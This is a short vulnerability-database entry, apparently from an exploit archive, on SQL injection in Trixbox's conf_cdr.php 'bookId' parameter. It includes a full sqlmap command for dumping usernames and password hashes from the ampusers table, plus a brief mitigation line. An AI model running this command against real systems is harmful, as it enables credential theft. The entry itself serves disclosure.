vendor:
Trixbox
by:
Sc4nX
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Trixbox
Affected Version From: All Versions
Affected Version To: All Versions
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Linux / Win 7
2014
SQL injection in Trixbox All Versions
SQL injection vulnerability exists in Trixbox All Versions. An attacker can exploit this vulnerability to grab users/password hashes from ampusers table in asterisk database. This can be done by using a python sqlmap tool with the following command: python sqlmap.py -u http://localhost/web-meetme/conf_cdr.php?bookId=1 -D asterisk -T ampusers -C username,password --dump --level 4 --risk 4 --no-cast --threads 10
Mitigation:
Input validation should be done to prevent SQL injection attacks. Also, the application should be tested for SQL injection vulnerabilities.